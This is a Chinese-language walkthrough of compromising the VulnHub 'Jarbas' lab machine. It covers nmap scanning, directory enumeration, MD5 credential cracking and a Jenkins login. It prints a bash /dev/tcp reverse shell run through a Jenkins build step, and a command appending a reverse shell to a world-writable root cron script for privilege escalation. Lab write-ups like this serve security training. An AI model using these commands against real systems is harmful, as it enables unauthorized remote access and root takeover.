JARBAS

靶机搭建

下载链接

https://download.vulnhub.com/jarbas/Jarbas.zip

注意下载后kali和靶机都要是nat模式

信息搜集

主机发现

对c段进行扫描，发现了138这台主机

sudo nmap -sn 192.168.213.0/24

端口扫描

接下来对靶机进行四次扫描

快速TCP扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.213.138 -oA ports

提取出开放的端口

grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',' 

常见端口的UDP扫描

sudo nmap -sU --top-ports 20 192.168.213.138 -oA udp

详细TCP扫描

sudo nmap -sT -sV -sC -O -p21,22,80,3306  192.168.213.138 -oA detail

漏洞脚本扫描

sudo nmap --script=vuln -p21,22,80,3306 192.168.213.138 -oA vuln

漏洞探测

Mysql

尝试一下未授权访问

sudo mysql -h 192.168.213.138 -u root -p

登录失败

Web渗透

扫到了80和8080两个端口，都访问看看

在80端口看到了一个，8080端口是登录页面（可能有弱口令），出现了Jenkins，搜索一下

Jenkins 是一个开源的「自动化部署 / 持续集成工具」

正常用途是给开发、运维用的：

• 自动编译代码
• 自动测试、打包
• 自动把项目部署到服务器

扫一下目录

sudo gobuster dir -u http://192.168.213.138 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

什么都没扫到

加几个常见文件后缀试试看

sudo gobuster dir -u http://192.168.213.138 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php

扫到了两个，去看看

显示凭证以安全的方式被加密了，看着像md5，解密一下

解密成功，是弱密码，尝试到8080去登录一下

第三个账号可以登录

反弹shell

Jenkins中有很多执行命令的方式

方法一

详见Jenkins未授权访问漏洞复现与 getshell 利用方法汇总 - 知乎
利用控制台执行命令反弹shell

方法二

新建一个项目

在build中可以执行shell命令

/bin/bash -i >& /dev/tcp/192.168.213.135/9999 0>&1

在kali上开启监听

nc -lnvp 9999

我现在拿到的不是完整的终端，并且权限也很低

提权

Cron Jobs提权

查看定时任务

发现每五分钟，会以root的权限执行/etc/script/CleaningScript.sh

看一下这个文件是个什么的，哦是清理日志的

查看一下这个文件的权限，如果可以修改，那就可以反弹到root的shell了

太好了，所有用户都可以写，直接将反弹shell命令追加到定时任务中

echo "/bin/bash -i >& /dev/tcp/192.168.213.135/8888 0>&1" >> /etc/script/CleaningScript.sh

等待一会，成功拿到root权限